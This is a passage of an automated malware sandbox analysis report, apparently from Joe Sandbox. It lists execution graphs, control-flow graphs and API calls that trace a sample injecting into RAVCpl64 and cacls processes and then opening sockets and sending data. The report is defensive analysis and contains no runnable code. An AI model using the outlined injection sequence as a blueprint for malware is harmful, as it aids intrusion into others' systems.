                                                                                                                                                                                                                                  • ExecuteOptions, xrefs: 015144AB
                                                                                                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01514460
                                                                                                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01514530
                                                                                                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01514592
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                                                                                                  • Opcode ID: 95ac67bb6115c9cfccc320aa0b04dcc65903d6a79aef2ef9d7241f6a86df9c6b
                                                                                                                                                                                                                                  • Instruction ID: 455b828c0b440dd302c0725ca761de07a019da23e6921a7b26cf18cd5a4b356c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95ac67bb6115c9cfccc320aa0b04dcc65903d6a79aef2ef9d7241f6a86df9c6b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99518031A0021A7AEF11AB95DC65FAE37A8FF14705F0404AFD605AB1A0E7709E41CF51
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: $$@
                                                                                                                                                                                                                                  • API String ID: 0-1194432280

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:3.7%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                  Total number of Nodes:41
                                                                                                                                                                                                                                  Total number of Limit Nodes:3
                                                                                                                                                                                                                                  execution_graph 8644 3dbc75b 8645 3dbc75d SleepEx 8644->8645 8647 3dbc7bd NtCreateSection 8645->8647 8648 3dbc77b 8645->8648 8647->8648 8649 3514431 8651 3514481 8649->8651 8650 35144b5 connect 8651->8650 8652 35158d2 8653 3515900 8652->8653 8654 3515940 LdrLoadDll 8653->8654 8655 3515904 8653->8655 8654->8655 8656 350b8c7 8658 350b8ef 8656->8658 8657 350b96f 8658->8657 8659 350b941 CreateThread 8658->8659 8660 35144e6 8662 3514525 8660->8662 8661 3514559 closesocket 8662->8661 8663 350c508 8666 350c524 8663->8666 8664 350c5b4 8665 350c54b SleepEx 8665->8666 8666->8664 8666->8665 8668 350b038 8666->8668 8670 350b07a 8668->8670 8669 350b114 8669->8666 8669->8669 8670->8669 8671 350b0fd SleepEx 8670->8671 8671->8670 8672 3dc0a96 8673 3dc0a9b 8672->8673 8674 3dc0b94 8673->8674 8676 3dbc8e8 8673->8676 8679 3dbc90e 8676->8679 8677 3dbc930 8677->8674 8678 3dbc93f SleepEx 8678->8679 8681 3dbc973 8678->8681 8679->8677 8679->8678 8680 3dbc9ac NtResumeThread 8680->8677 8681->8677 8681->8680 8682 351423d 8683 3514290 8682->8683 8684 35142c4 socket 8683->8684 8685 351437e 8687 35143d1 8685->8687 8686 3514405 send 8687->8686

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 0 3dbc6e4-3dbc6e5 1 3dbc69e-3dbc6ca 0->1 2 3dbc6e7-3dbc6e9 0->2 3 3dbc6cc-3dbc6d6 1->3 4 3dbc717-3dbc74f 1->4 5 3dbc6eb-3dbc6fc 2->5 6 3dbc75d-3dbc779 SleepEx 2->6 8 3dbc66b-3dbc675 3->8 9 3dbc6d8-3dbc6dd 3->9 16 3dbc7bc 4->16 17 3dbc751 4->17 12 3dbc77b-3dbc77f 6->12 13 3dbc7bd-3dbc812 NtCreateSection 6->13 14 3dbc677-3dbc698 8->14 15 3dbc645-3dbc66a 8->15 9->4 18 3dbc793-3dbc798 12->18 19 3dbc781-3dbc78e call 3dc9988 12->19 21 3dbc79a-3dbc7a1 13->21 22 3dbc814-3dbc82d 13->22 14->1 15->8 18->21 19->18 25 3dbc7a3-3dbc7bb 21->25 22->21 27 3dbc833-3dbc872 22->27 25->16 27->21 29 3dbc878-3dbc8b6 27->29 29->21 31 3dbc8bc-3dbc8d4 29->31 31->25
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183790113877.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B80000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3b80000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                                                  • String ID: 0$@$@
                                                                                                                                                                                                                                  • API String ID: 3472027048-3221051908

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183790113877.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B80000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3b80000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ResumeSleepThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1530989685-0

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 52 350b038-350b074 53 350b07a-350b07e 52->53 54 350b084-350b087 53->54 55 350b105-350b10e 53->55 54->55 56 350b089-350b0fb call 3517ff8 call 3517fc8 call 3518738 54->56 55->53 57 350b114-350b11d 55->57 56->55 71 350b0fd-350b103 SleepEx 56->71 59 350b15f-350b17c 57->59 60 350b11f-350b126 57->60 62 350b144-350b14d 60->62 63 350b128-350b12f 60->63 62->59 64 350b14f-350b156 62->64 66 350b138-350b142 63->66 64->59 67 350b158-350b159 64->67 66->62 66->66 67->59 71->55
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183789647493.0000000003490000.00000040.80000000.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3490000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3472027048-0

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 72 350b7f9-350b80f 73 350b811-350b817 72->73 74 350b81b-350b83b 72->74 75 350b848 73->75 76 350b819-350b81a 73->76 77 350b868-350b86a 74->77 78 350b83d-350b83e 74->78 81 350b84a-350b851 75->81 82 350b87b-350b889 75->82 76->74 79 350b86c-350b878 77->79 80 350b843-350b844 78->80 79->82 80->75 81->80 85 350b853-350b85b 81->85 83 350b892-350b8bb 82->83 84 350b88d call 3517ff8 82->84 84->83 85->79 89 350b85d-350b864 85->89 89->77
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183789647493.0000000003490000.00000040.80000000.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3490000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 90 350c508-350c547 call 35072f8 call 35175e8 95 350c5b4-350c5c3 90->95 96 350c549 90->96 97 350c54b-350c55d SleepEx 96->97 98 350c5a1-350c5a8 97->98 99 350c55f-350c563 97->99 98->97 100 350c5aa-350c5b2 call 350c498 98->100 99->97 101 350c565-350c56f 99->101 100->97 101->97 103 350c571-350c577 101->103 103->97 104 350c579-350c57f 103->104 104->97 106 350c581-350c592 call 35129f8 call 350b038 104->106 110 350c597-350c59f call 350b188 106->110 110->97
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183789647493.0000000003490000.00000040.80000000.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3490000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3472027048-0

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 127 3dbc708-3dbc70b 128 3dbc70d-3dbc711 127->128 129 3dbc763-3dbc779 SleepEx 127->129 132 3dbc73c-3dbc74f 128->132 133 3dbc713-3dbc73b 128->133 130 3dbc77b-3dbc77f 129->130 131 3dbc7bd-3dbc812 NtCreateSection 129->131 136 3dbc793-3dbc798 130->136 137 3dbc781-3dbc78e call 3dc9988 130->137 138 3dbc79a-3dbc7a1 131->138 139 3dbc814-3dbc82d 131->139 134 3dbc7bc 132->134 135 3dbc751 132->135 133->132 136->138 137->136 141 3dbc7a3-3dbc7bb 138->141 139->138 144 3dbc833-3dbc872 139->144 141->134 144->138 146 3dbc878-3dbc8b6 144->146 146->138 148 3dbc8bc-3dbc8d4 146->148 148->141
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183790113877.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B80000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3b80000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3472027048-0

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 113 351437e-35143d9 call 3510f88 116 3514405-3514430 send 113->116 117 35143db-35143ff call 35175e8 113->117 117->116
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183789647493.0000000003490000.00000040.80000000.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3490000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: send
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2809346765-0

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 120 3514431-3514489 call 3511018 123 35144b5-35144d8 connect 120->123 124 351448b-35144af call 35175e8 120->124 124->123
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183789647493.0000000003490000.00000040.80000000.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3490000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: connect
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1959786783-0

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 149 351423d-3514298 call 3510e58 152 35142c4-35142e5 socket 149->152 153 351429a-35142be call 35175e8 149->153 153->152
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183789647493.0000000003490000.00000040.80000000.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3490000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: socket
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 98920635-0

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 156 350b8c7-350b8ed 157 350b90d-350b93a call 35072f8 call 35175e8 156->157 158 350b8ef-350b8fa call 3517e48 156->158 166 350b93c-350b96e call 351becb CreateThread 157->166 167 350b96f-350b979 157->167 158->157 164 350b8fc-350b906 158->164 164->157
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183789647493.0000000003490000.00000040.80000000.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3490000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2422867632-0

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 170 35158d2-3515902 call 3518558 173 3515904-351590e 170->173 174 351590f-351591b call 351ba08 170->174 177 3515929-351593e call 3517d68 174->177 178 351591d-3515924 call 351bcd8 174->178 182 3515940-3515955 LdrLoadDll 177->182 183 351595c-3515964 177->183 178->177 182->183
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183789647493.0000000003490000.00000040.80000000.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3490000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2234796835-0

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 184 35144e6-351452d call 35110a8 187 3514559-351456c closesocket 184->187 188 351452f-3514553 call 35175e8 184->188 188->187
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183789647493.0000000003490000.00000040.80000000.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3490000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: closesocket
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2781271927-0

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 191 3dbc75b-3dbc779 SleepEx 194 3dbc77b-3dbc77f 191->194 195 3dbc7bd-3dbc812 NtCreateSection 191->195 196 3dbc793-3dbc798 194->196 197 3dbc781-3dbc78e call 3dc9988 194->197 198 3dbc79a-3dbc7a1 195->198 199 3dbc814-3dbc82d 195->199 196->198 197->196 201 3dbc7a3-3dbc7bc 198->201 199->198 204 3dbc833-3dbc872 199->204 204->198 206 3dbc878-3dbc8b6 204->206 206->198 208 3dbc8bc-3dbc8d4 206->208 208->201
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183790113877.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B80000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3b80000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateSectionSleep
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2866269021-0

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 217 3dbc758-3dbc779 SleepEx 219 3dbc77b-3dbc77f 217->219 220 3dbc7bd-3dbc812 NtCreateSection 217->220 221 3dbc793-3dbc798 219->221 222 3dbc781-3dbc78e call 3dc9988 219->222 223 3dbc79a-3dbc7a1 220->223 224 3dbc814-3dbc82d 220->224 221->223 222->221 226 3dbc7a3-3dbc7bc 223->226 224->223 229 3dbc833-3dbc872 224->229 229->223 231 3dbc878-3dbc8b6 229->231 231->223 233 3dbc8bc-3dbc8d4 231->233 233->226
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183790113877.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B80000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3b80000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateSectionSleep
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2866269021-0

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 209 350b8bc-350b92b 211 350b934-350b93a 209->211 212 350b92f call 35175e8 209->212 213 350b93c-350b96e call 351becb CreateThread 211->213 214 350b96f-350b979 211->214 212->211
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183789647493.0000000003490000.00000040.80000000.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3490000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183790113877.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B80000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3b80000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183789647493.0000000003490000.00000040.80000000.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3490000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183789647493.0000000003490000.00000040.80000000.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3490000_RAVCpl64.jbxd

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:0.4%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                  Total number of Nodes:11
                                                                                                                                                                                                                                  Total number of Limit Nodes:1
                                                                                                                                                                                                                                  execution_graph 76992 37829f0 LdrInitializeThunk 77000 35cede8 77001 35cee0d 77000->77001 77002 35cef77 NtQueryInformationProcess 77001->77002 77005 35cefe4 77001->77005 77003 35cefb1 77002->77003 77004 35cf083 NtReadVirtualMemory 77003->77004 77003->77005 77004->77005 77007 3782b20 77009 3782b2a 77007->77009 77010 3782b3f LdrInitializeThunk 77009->77010 77011 3782b31 77009->77011

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 0 35ceddd-35cee0b 2 35cee0d-35cee24 call 35d0ff8 0->2 3 35cee29-35cee48 call 35d1018 call 35cce58 0->3 2->3 9 35cf3fd-35cf408 3->9 10 35cee4e-35cef4e call 35ced18 call 35d1018 call 35d4f24 call 35c0388 call 35d05e8 call 35c0388 call 35d05e8 call 35d2ce8 3->10 27 35cef54-35cefe2 call 35c0388 call 35d05e8 NtQueryInformationProcess call 35d1018 call 35c0388 call 35d05e8 10->27 28 35cf3f1-35cf3f8 call 35ced18 10->28 40 35cefe4-35ceff1 27->40 41 35ceff6-35cf06c call 35d4f32 call 35c0388 call 35d05e8 27->41 28->9 40->28 41->40 50 35cf072-35cf081 call 35d4f5c 41->50 53 35cf0ce-35cf10e call 35c0388 call 35d05e8 call 35d3628 50->53 54 35cf083-35cf0c9 NtReadVirtualMemory call 35d1d08 50->54 63 35cf12d-35cf21d call 35c0388 call 35d05e8 call 35d4f6a call 35c0388 call 35d05e8 call 35d3008 call 35d0fc8 * 3 call 35d4f5c 53->63 64 35cf110-35cf128 53->64 54->28 87 35cf24d-35cf265 call 35d4f5c 63->87 88 35cf21f-35cf24b call 35d4f5c call 35d0fc8 call 35d4fbe call 35d4f78 63->88 64->28 93 35cf267-35cf28c call 35d27b8 87->93 94 35cf291-35cf2a3 call 35d1c48 87->94 99 35cf2a8-35cf2b2 88->99 93->94 94->99 101 35cf36e-35cf3d1 call 35c0388 call 35d05e8 call 35d3938 99->101 102 35cf2b8-35cf302 call 35c0388 call 35d05e8 call 35d3318 call 35d4f5c 99->102 101->28 127 35cf3d3-35cf3ec call 35d0ff8 101->127 121 35cf334-35cf33c call 35d4f5c 102->121 122 35cf304-35cf32a call 35d5008 call 35d4fbe 102->122 121->101 131 35cf33e-35cf349 121->131 122->121 127->28 131->101 133 35cf34b-35cf369 call 35d3c48 131->133 133->101
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • NtQueryInformationProcess.NTDLL ref: 035CEF96
                                                                                                                                                                                                                                  • NtReadVirtualMemory.NTDLL ref: 035CF09E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790416695.00000000035C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_35c0000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                  • API String ID: 1498878907-4108050209

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 135 35cede8-35cee0b 136 35cee0d-35cee24 call 35d0ff8 135->136 137 35cee29-35cee48 call 35d1018 call 35cce58 135->137 136->137 143 35cf3fd-35cf408 137->143 144 35cee4e-35cef4e call 35ced18 call 35d1018 call 35d4f24 call 35c0388 call 35d05e8 call 35c0388 call 35d05e8 call 35d2ce8 137->144 161 35cef54-35cefe2 call 35c0388 call 35d05e8 NtQueryInformationProcess call 35d1018 call 35c0388 call 35d05e8 144->161 162 35cf3f1-35cf3f8 call 35ced18 144->162 174 35cefe4-35ceff1 161->174 175 35ceff6-35cf06c call 35d4f32 call 35c0388 call 35d05e8 161->175 162->143 174->162 175->174 184 35cf072-35cf081 call 35d4f5c 175->184 187 35cf0ce-35cf10e call 35c0388 call 35d05e8 call 35d3628 184->187 188 35cf083-35cf0c4 NtReadVirtualMemory call 35d1d08 184->188 197 35cf12d-35cf21d call 35c0388 call 35d05e8 call 35d4f6a call 35c0388 call 35d05e8 call 35d3008 call 35d0fc8 * 3 call 35d4f5c 187->197 198 35cf110-35cf128 187->198 191 35cf0c9 188->191 191->162 221 35cf24d-35cf265 call 35d4f5c 197->221 222 35cf21f-35cf24b call 35d4f5c call 35d0fc8 call 35d4fbe call 35d4f78 197->222 198->162 227 35cf267-35cf28c call 35d27b8 221->227 228 35cf291-35cf2a3 call 35d1c48 221->228 233 35cf2a8-35cf2b2 222->233 227->228 228->233 235 35cf36e-35cf3d1 call 35c0388 call 35d05e8 call 35d3938 233->235 236 35cf2b8-35cf302 call 35c0388 call 35d05e8 call 35d3318 call 35d4f5c 233->236 235->162 261 35cf3d3-35cf3ec call 35d0ff8 235->261 255 35cf334-35cf33c call 35d4f5c 236->255 256 35cf304-35cf32a call 35d5008 call 35d4fbe 236->256 255->235 265 35cf33e-35cf349 255->265 256->255 261->162 265->235 267 35cf34b-35cf369 call 35d3c48 265->267 267->235
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • NtQueryInformationProcess.NTDLL ref: 035CEF96
                                                                                                                                                                                                                                  • NtReadVirtualMemory.NTDLL ref: 035CF09E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790416695.00000000035C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_35c0000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                  • API String ID: 1498878907-4108050209
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 278 3782b10-3782b1c LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 277 3782b00-3782b0c LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
